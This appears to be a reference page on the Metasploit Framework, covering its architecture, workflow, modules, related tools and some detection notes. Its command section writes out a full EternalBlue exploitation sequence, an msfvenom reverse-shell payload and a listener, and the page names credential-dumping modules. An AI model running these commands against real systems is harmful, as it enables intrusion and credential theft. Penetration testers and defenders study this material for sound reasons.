Metasploit Framework

Overview

Metasploit Framework (MSF) is a Ruby-based modular exploitation platform. Rapid7 maintains commercial Metasploit Pro; the open-source Framework drives msfconsole, msfvenom, and thousands of community modules.

Runtime architecture: msfconsole REPL → module loader (mixins for exploit, payload, encoder) → Rex library (network protocol primitives) → optional PostgreSQL db for workspace persistence (hosts, services, creds, loot, sessions).

Typical workflow: `db_nmap` or import → `search type:exploit platform:windows cve:2021` → `use exploit/...` → `set RHOSTS`, `set payload`, `set LHOST` → `check` (if supported) → `run` → `sessions -i` → `run post/multi/recon/...`.

Payload staging: stagers (small bootstrap) pull stage (full payload) over the wire. Meterpreter runs as reflective DLL in memory—avoids disk artifacts but has distinct network/API indicators. Encoders (`-e`) and evasion modules modify delivery; they are not magic AV bypass.

Module search supports grep-like filters: `search type:auxiliary name:smb`, `search cve:2024 rank:excellent`. `info` shows options, references, and compatible payloads. `advanced` and `evasion` tabs expose rarely-needed tuning.

Resource scripts (.rc) automate sequences for CTF and repeat engagements: `msfconsole -r autopwn.rc`. Armitage and RPC API enable GUI and third-party orchestration.

Primary use cases

• Exploit validation for CVEs with configurable targets and badchars
• Payload generation via msfvenom for shellcode injection labs
• Auxiliary scanning (SMB version, FTP anon, SMTP users) without exploitation
• Post-exploitation credential harvest and pivot setup on Meterpreter sessions
• Evasion module testing against AMSI/ETW in lab Windows hosts

Key commands

msfdb init && msfconsole -q -x 'workspace -a engagement; db_nmap -sV 10.0.0.0/24'

search cve:2017-0144 type:exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.0.0.5
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.0.100
run

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.100 LPORT=4444 -f raw -o shell.bin

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.0.100
set LPORT 4444
run -j

Notable modules / features

• Module types: exploit, auxiliary, payload, encoder, nop, post, evasion
• Meterpreter: hashdump, migrate, portfwd, route, kiwi, getsystem
• msfvenom: -f formats (exe, elf, ps1, aspx, java), -x template injection
• Plugins: db_autopwn, socket_filter, event systems
• Integration with Nexpose/Nmap via db_* commands

Detection / defense notes

• Monitor for Metasploit default payloads and certificate patterns
• Segment lateral movement; block unexpected SMB/RPC from workstations
• EDR signatures on Meterpreter reflective loading and common post modules
• Network IDS for EternalBlue, Shellshock, and known exploit traffic

Related tools

• armitage — Metasploit GUI. Team server for collaborative red team operations.
• Sploitus — Exploit and tool search engine. Aggregates Exploit-DB, GitHub PoCs, and Metasploit modules into one query interface.
• Impacket — Python protocol implementations. secretsdump, psexec, getTGT, and SMB/Kerberos tooling for Windows networks.
• Cobalt Strike — Commercial adversary simulation platform. Beacon C2, malleable profiles, team server. Licensed red-team software.

Modules

Interfaces

msfconsole

Interactive REPL. search, use, set, run, sessions, routes. Tab completion and resource script execution (-r).

msfvenom

Payload generator CLI. -p payload, -f format (exe, elf, raw, ps1), encoders, badchars, iterations.

resource scripts

Automated command sequences (.rc files). Chain recon, exploit, and post modules for repeatable engagements.

msfdb / workspace

PostgreSQL-backed state. Hosts, services, creds, loot, and session history persist across runs.